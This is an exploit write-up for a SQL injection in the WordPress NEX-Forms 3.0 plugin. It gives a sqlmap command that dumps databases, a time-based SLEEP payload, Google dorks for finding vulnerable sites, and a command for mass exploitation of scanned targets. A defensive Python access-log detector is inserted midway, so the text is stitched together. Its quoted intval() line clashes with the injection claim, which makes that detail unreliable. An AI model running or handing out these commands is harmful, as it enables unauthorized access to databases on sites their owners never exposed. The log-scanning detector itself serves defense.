WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability
MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL Injection Vulnerability
# SCRIPT AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
# Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
# Vulnerability discovered by: Claudio Viviani
- VENDOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Vulnerability Description
The "submit_nex_form" ajax function is affected by an SQL injection vulnerability.
- Tool Description
Automation script that exploits targets with the help of the SqlMap tool. The SqlMap command it executes:
{$params['folder']} -u '{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
--technique=B -p nex_forms_Id --dbms mysql {$params['proxy']} --random-agent
--answers='follow=N' --dbs --batch --time-sec 10 --level 2 --risk 1
- GET VULN
SQL can be injected through the following GET parameter:
GET VULN: nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex: http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
- XPL inject DBMS: 'MySQL'
Exploit: AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
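A defender-side check for the request pattern described above, as an added example that is not part of the original script: it scans web server access log lines for submit_nex_form requests whose nex_forms_Id is not a plain integer. The function name, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Apache/nginx "combined" access log format.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" \d{3}')

def suspicious_nex_forms_requests(log_lines):
    """Return (client_ip, decoded_value) for every submit_nex_form request
    whose nex_forms_Id query parameter is not a plain decimal integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, uri = m.groups()
        parts = urlsplit(uri)
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        query = parse_qs(parts.query)  # percent-decodes the values
        if "submit_nex_form" not in query.get("action", []):
            continue
        for value in query.get("nex_forms_Id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, value))
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    # Legitimate form submission: integer id.
    '192.0.2.10 - - [21/Apr/2015:10:00:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=submit_nex_form&nex_forms_Id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # The time-based payload quoted on this page, URL-encoded.
    '198.51.100.7 - - [21/Apr/2015:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=submit_nex_form&nex_forms_Id=1%20AND%20(SELECT%20*%20FROM%20'
    '(SELECT(SLEEP(10)))NdbE) HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    # Different ajax action: out of scope for this check.
    '192.0.2.11 - - [21/Apr/2015:10:00:09 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat&nex_forms_Id=abc HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    # POST with parameters in the body: invisible in access logs.
    '192.0.2.12 - - [21/Apr/2015:10:00:12 +0000] "POST /wp-admin/admin-ajax.php'
    ' HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, value in suspicious_nex_forms_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer nex_forms_Id: {value!r}")
```

Because the parameter is read from $_REQUEST, the same value can arrive in a POST body, which access logs do not record; covering that case needs request-body logging or a WAF rule.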
- GOOGLE DORK
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
- COMMAND --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php wp3xplo1t.php -t target
php wp3xplo1t.php -f targets.txt
php wp3xplo1t.php -t target -p 'http://localhost:9090'
- EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
- DOWNLOAD INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
- REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli